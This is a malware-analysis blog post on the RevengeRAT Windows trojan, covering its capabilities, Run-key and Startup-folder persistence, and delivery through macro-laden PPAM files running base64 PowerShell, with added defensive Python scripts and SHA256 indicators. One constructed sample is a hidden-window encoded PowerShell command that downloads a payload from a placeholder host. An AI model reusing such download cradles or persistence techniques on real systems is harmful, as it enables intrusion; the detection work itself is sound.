Deep Diving into RevengeRAT

ASM Cybersecurity
4 min read · Mar 18, 2024


Revenge RAT is a Trojan designed for Windows systems. It responds to commands from a remote control server, enabling actions such as gathering system details, executing or updating files from a provided link or disk, loading plugins, and performing various malicious activities. Furthermore, it establishes persistence on the infected system by creating a Run key Registry entry and a shortcut within the user’s Startup folder.

Target — Windows Platform.

Infection Vector — Malspam campaign of phishing emails.

Functionalities typically include:

  • Unauthorized Remote Access: RevengeRAT grants attackers remote control over compromised systems, enabling them to execute commands and alter settings without user authorization.
  • Information Theft: The malware pilfers sensitive data like credentials, keystrokes, and personal details, facilitating malicious activities such as identity theft and financial fraud.
  • Surveillance Capabilities: RevengeRAT surveils user actions by capturing screenshots, recording audio/video, and logging keystrokes, furnishing attackers with insights into victim behaviour.
  • Persistence Mechanisms: The malware employs methods to sustain prolonged access to infected systems, ensuring continued operation and evasion of detection even after system restarts.
  • Propagation and Potential Destructive Actions: Certain iterations of RevengeRAT may propagate to other networked systems and carry out destructive maneuvers such as file deletion or system manipulation, presenting a substantial threat to individuals and organizations alike.
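The persistence described above (a Run key value plus a shortcut in the user's Startup folder) is exactly the kind of artifact endpoint telemetry catches early. The following Python script is an added example, not code from the article or from ASM Cybersecurity: it runs a simple detection over constructed Sysmon-style events (EventID 13 registry value set, EventID 11 file create), flags Run/RunOnce key writes and new .lnk files in a Startup folder, and rates the hit higher when the writing process lives in a user-writable location. Event field names follow Sysmon's schema; the sample events, paths and process names are invented.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events (not from the article's sandbox run).
# EventID 13 = RegistryEvent (value set), EventID 11 = FileCreate.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Roaming\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\update",
     "Details": r"C:\Users\victim\AppData\Roaming\update.exe"},
    {"EventID": 11, "Image": r"C:\Users\victim\AppData\Roaming\update.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\Updater.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": r"C:\Program Files\Vendor\Updater.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\victim\Documents\notes.txt"},
]

# Run and RunOnce keys under any hive (HKLM, HKCU, HKU\<sid>)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Shortcut dropped into a per-user or all-users Startup folder
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
# Locations a legitimate installer rarely autostarts a binary from
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)


def rate(image: str) -> str:
    """High when the process establishing persistence runs from a user-writable path."""
    return "high" if USER_WRITABLE_RE.search(image) else "low"


def find_persistence(events: List[Dict]) -> List[Dict]:
    """Return one hit per event that writes a Run key value or a Startup .lnk."""
    hits = []
    for ev in events:
        if ev["EventID"] == 13 and RUN_KEY_RE.search(ev.get("TargetObject", "")):
            hits.append({"technique": "run_key", "image": ev["Image"],
                         "artifact": ev["TargetObject"], "severity": rate(ev["Image"])})
        elif ev["EventID"] == 11 and STARTUP_LNK_RE.search(ev.get("TargetFilename", "")):
            hits.append({"technique": "startup_folder", "image": ev["Image"],
                         "artifact": ev["TargetFilename"], "severity": rate(ev["Image"])})
    return hits


if __name__ == "__main__":
    for hit in find_persistence(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['technique']}: {hit['image']} -> {hit['artifact']}")
```

The severity rule is deliberately crude; in production you would combine it with signer information and prevalence, but even this split separates the vendor updater in Program Files from a binary autostarting out of AppData.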

Technical Analysis of RevengeRAT:

Currently, malware creators are utilizing evasion strategies within PPAM files, embedding obfuscated content to heighten the complexity of analyzing the sample.

PPAM (PowerPoint Add-in Macro-Enabled Presentation) files, while less recognized, are increasingly utilized in malware campaigns due to their appealing features such as macro-enabled functionality and obfuscation techniques.

Typically, when opening .ppam files, a dialog message box prompts users to enable macros to access the file’s content. However, this action restricts navigation to other pages. Malware authors exploit this feature to their advantage by embedding malicious macros.

.ppam > Before Enabled Macros

.ppam > After Enabled Macros

In this scenario, the dialog box, which is itself part of the obfuscated content, includes a version indicator. Each attempt to enable the content only increments the version number, so the dialog never closes.

Pop-up error which triggers the macro functions

Upon opening the dialog box, the macro functions are activated and execute PowerShell commands in the background. These commands, encoded in base64, retrieve the payload file from Firebase Storage and proceed to carry out the malicious actions.

Hard-coded PowerShell commands:
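The base64-encoded PowerShell that the macro launches is the first thing an analyst wants to read in clear text. The script below is an added example, not the article's hard-coded command and not code from ASM Cybersecurity: it takes a process command line, locates the encoded-command argument (PowerShell accepts abbreviations such as -e, -ec and -enc, which the prefix check mirrors), decodes the UTF-16LE base64 payload, pulls out any URLs and notes whether a hidden window was requested. The sample command line is constructed here, with a placeholder host standing in for the real Firebase Storage URL.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample (not the command hard-coded in the analysed PPAM): a hidden-window
# PowerShell launch with an -EncodedCommand, built at runtime so the base64 is exact.
_DECODED_SAMPLE = ("Invoke-WebRequest -Uri 'https://firebasestorage.example/v0/b/placeholder/o/payload.bin' "
                   "-OutFile $env:TEMP\\update.bin")
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
                  + base64.b64encode(_DECODED_SAMPLE.encode("utf-16le")).decode("ascii"))

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16le")


def extract_urls(text: str) -> List[str]:
    return URL_RE.findall(text)


def triage_powershell(cmdline: str) -> Dict:
    """Decode an encoded PowerShell command line and summarise what it reaches out to."""
    tokens = cmdline.split()
    decoded: Optional[str] = None
    hidden = False
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if not flag:
            continue
        # PowerShell resolves any unambiguous prefix of a parameter name
        if "encodedcommand".startswith(flag):
            decoded = decode_encoded_command(tokens[i + 1])
        elif "windowstyle".startswith(flag) and tokens[i + 1].lower() == "hidden":
            hidden = True
    return {
        "decoded": decoded,
        "urls": extract_urls(decoded) if decoded else [],
        "hidden_window": hidden,
    }


if __name__ == "__main__":
    report = triage_powershell(SAMPLE_CMDLINE)
    print("hidden window:", report["hidden_window"])
    print("decoded:", report["decoded"])
    print("urls:", report["urls"])
```

Feed it the CommandLine field from Sysmon EventID 1 or Windows Security event 4688 and the extracted URLs can be pushed straight to the IoC list.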

Indicators of Compromise:

Indicators of Compromise (IoCs) are signs or clues that suggest a computer system has been breached or compromised, helping cybersecurity experts detect and respond to security incidents. They include abnormal activities, patterns, or artifacts that may indicate unauthorized access or malicious actions.

Sandbox Results

HTTP Response of the URL:

Host Identifiers:

  1. SHA256: dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044 | File Type — .ppam
  2. SHA256: 0d4bad932d1b05dcc6d01613ca6e90a401026ddb274c5ad553e071a0df22767a | File Type — .xls
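Two checks follow directly from the analysis above and the hashes just listed: does an incoming file hash-match a known sample, and does a .ppam (an OOXML zip package) carry a VBA project at all, regardless of hash? The script below is an added example, not code from the article or from ASM Cybersecurity. It computes the SHA256 of a file's bytes, compares it against the two IoCs from this post, and, when the bytes are a zip, looks for a vbaProject.bin part and for the VBA content type in [Content_Types].xml. The packages it inspects are constructed in memory as stand-ins (the part path ppt/vbaProject.bin and the minimal package layout are assumptions), so nothing here touches the real samples.

```python
import hashlib
import io
import zipfile
from typing import Dict

# SHA256 IoCs listed in the article
IOC_SHA256 = {
    "dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044": ".ppam",
    "0d4bad932d1b05dcc6d01613ca6e90a401026ddb274c5ad553e071a0df22767a": ".xls",
}
# Content type Office declares for an embedded VBA project
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def build_sample_package(with_macro: bool) -> bytes:
    """Constructed minimal OOXML-style zip standing in for a .ppam; not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        types = ['<Default Extension="xml" ContentType="application/xml"/>']
        if with_macro:
            types.append(f'<Override PartName="/ppt/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
            # placeholder bytes, not a real OLE container
            z.writestr("ppt/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
        z.writestr("[Content_Types].xml", "<Types>" + "".join(types) + "</Types>")
        z.writestr("ppt/presentation.xml", "<presentation/>")
    return buf.getvalue()


def inspect_package(data: bytes) -> Dict:
    """Hash-match against the IoC list and look for macro parts inside the package."""
    sha256 = hashlib.sha256(data).hexdigest()
    result = {"sha256": sha256, "ioc_match": IOC_SHA256.get(sha256),
              "is_zip": False, "macro_parts": [], "declares_vba": False}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Any part named vbaProject.bin, wherever the package puts it
        result["macro_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        if "[Content_Types].xml" in names:
            types_xml = z.read("[Content_Types].xml").decode("utf-8", "replace")
            result["declares_vba"] = VBA_CONTENT_TYPE in types_xml
    return result


if __name__ == "__main__":
    for label, blob in (("macro", build_sample_package(True)), ("clean", build_sample_package(False))):
        r = inspect_package(blob)
        print(label, r["sha256"][:16], "ioc:", r["ioc_match"], "macro parts:", r["macro_parts"])
```

Hash matching only catches the exact samples seen before; the macro-part check catches the next PPAM the campaign mails out, which is why both belong in triage.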

Reference:

https://www.virustotal.com/gui/file/dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044

https://www.virustotal.com/gui/file/0d4bad932d1b05dcc6d01613ca6e90a401026ddb274c5ad553e071a0df22767a

Happy Learning!!!

Author : Priyadharshini K B (Priyadharshini is a SOC Lead and Threat Researcher at ASM Cybersecurity)

#Cybersecurity #RevengeRAT #Malware #Trojan #ThreatAnalysis #InfoSec #DigitalSecurity #CyberThreats #CyberDefense #CyberAttack #MalwareAnalysis #CyberThreatIntelligence #SecurityResearch #DataSecurity #CyberAwareness #NetworkSecurity #EndpointSecurity #CyberCrime #InfoSecurity #CyberSafety #ITSecurity #CyberThreatsAnalysis


ASM Cybersecurity

Welcome to ASM Cybersecurity, a division of ASM Technologies Limited! We help you stay vigilant in the digital world. https://www.asmltd.com/cyber-security/